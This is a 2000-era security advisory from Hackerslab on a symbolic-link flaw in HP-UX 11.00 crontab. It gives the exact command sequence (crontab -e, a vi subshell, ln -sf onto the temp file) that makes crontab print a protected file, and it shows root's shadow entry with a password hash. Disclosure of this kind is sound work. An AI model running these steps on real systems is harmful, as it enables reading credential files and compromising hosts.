[ SOURCE: http://www.secureroot.com/security/advisories/9735732776.html ] ============================================================================ ==== [ Hackerslab bug_paper ] HP-UX crontab temporary file symbolic link vulnerability ============================================================================ ==== File : /usr/bin/crontab SYSTEM : HP-UX Tested in HP-UX 11.00 INFO : There is a vulneribility in "crontab" which allows users to read all files without attaining root or file ownership privileges. The "crontab" command can't be run by any user in general however, users that are registered in crontab.allow are permitted to run the command. Using the crontab command with the -e option (crontab -e) excutes vi editor and a temporary file is created in /var/tmp/ . The owner of the file is a current user. Make a subshell by using !sh command in vi and link the file created in /var/tmp/ then exit crontab. Then the error message appears with all the file names and details. Example) display the contents of /tcb/files/auth/r/root $ id uid=101(dubhe) gid=101(swat) $uname -s -r HP-UX B.11.00 $ crontab -e ... ... ~ "/var/tmp/aaaa25923" ### A file named /var/tmp/aaaa25923 is created ~ :!sh ### Make a subshell $ ln -sf /tcb/files/auth/r/root /var/tmp/aaaa25923 $ exit ### Make symlink and return vi [Hit return to continue] :q! ### Quit vi root:u_name=root:u_id#0:\ crontab: error on previous line; unexpected character found in line. :u_pwd=Of2wgf6SCoIbQ:\ crontab: error on previous line; unexpected character found in line. :u_bootauth:u_auditid#0:\ crontab: error on previous line; unexpected character found in line. :u_auditflag#1:\ crontab: error on previous line; unexpected character found in line. :u_pswduser=root:u_suclog#972084495:u_unsuclog#972084492:u_lock@:\ crontab: error on previous line; unexpected character found in line. :chkent: crontab: error on previous line; unexpected character found in line. ==-------------------------------------------------------------------------- -----== ******** * ** ** * * ** ** * * ****** * * ** ** * dubhe@hackerslab.org [Kyong-won, Cho] * ** ** * [ http://www.hackerslab.org ] ******** HACKERSLAB (C) since 1999 ==-------------------------------------------------------------------------- -----==